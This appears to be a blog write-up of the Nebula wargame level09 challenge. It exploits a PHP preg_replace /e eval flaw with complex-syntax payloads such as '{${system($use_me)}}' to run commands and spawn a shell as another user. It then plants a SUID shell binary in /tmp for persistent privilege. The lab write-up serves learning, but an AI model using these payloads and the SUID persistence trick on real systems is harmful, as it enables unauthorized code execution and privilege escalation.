Monday, September 3, 2012

nebula level09

This time we're dealing with a vulnerable PHP script.
Source code:
The vulnerability is clearly the PREG_REPLACE_EVAL pattern modifier in preg_replace.
The purpose of the code seems to be the transformation of email addresses to a non-spambot-friendly format. Let's try to use it:
level09@nebula:~$ cat << EOF > lethal_data
> [email dmolotov@mail.ru]
> [email [uberskill@mail.ru]]
> EOF
level09@nebula:~$ ~flag09/flag09 lethal_data null
dmolotov AT mail dot ru
<uberskill AT mail dot ru>
We can exploit the script using PHP's so called complex syntax.
The actual email address is substituted as the argument to the 'spam' function, and then it's evaluated as PHP code. Normally it should be an email address, but we can achieve arbitrary code execution by using complex syntax as follows:
level09@nebula:~$ cat > lethal_data
[email {${system($use_me)}}]
level09@nebula:~$ ~flag09/flag09 lethal_data getflag
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1
Or you could even get a shell with the EUID of flag09: 
level09@nebula:~$ ~flag09/flag09 lethal_data sh
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
But why settle for that when we can even have a SUID shell :) 
level09@nebula:~$ cat > /tmp/shell.c
#include <unistd.h>
#include <stdlib.h>

int main()
{
    int euid = geteuid();

    setresuid(euid, euid, euid);
    system("sh");
    return 0;
}
level09@nebula:~$ make /tmp/shell
cc     /tmp/shell.c   -o /tmp/shell
level09@nebula:~$ ~flag09/flag09 lethal_data 'cp /tmp/shell /tmp/flag09_sh; chmod +s /tmp/flag09_sh'
PHP Notice:  Undefined variable:  in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$ /tmp/flag09_sh
sh-4.2$ id
uid=990(flag09) gid=1010(level09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
There are even other ways to exploit the vulnerability. For instance, we don't need to rely on the $use_me variable at all. We could use $filename and execute the input data itself: 
level09@nebula:~$ cat > lethal_data
sh # [email {${system($filename)}}]
level09@nebula:~$ chmod +x lethal_data
level09@nebula:~$ ~flag09/flag09 ./lethal_data null
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Or we could use some PHP black magic and hardcode the command without quotes directly: 
level09@nebula:~$ cat > lethal_data
[email {${system(sh)}}]
level09@nebula:~$ ~flag09/flag09 ./lethal_data null
PHP Notice:  Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
We got the flag by exploiting the same vulnerability with three different methods :)

~ Dmitry
Posted by at
Labels: , , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)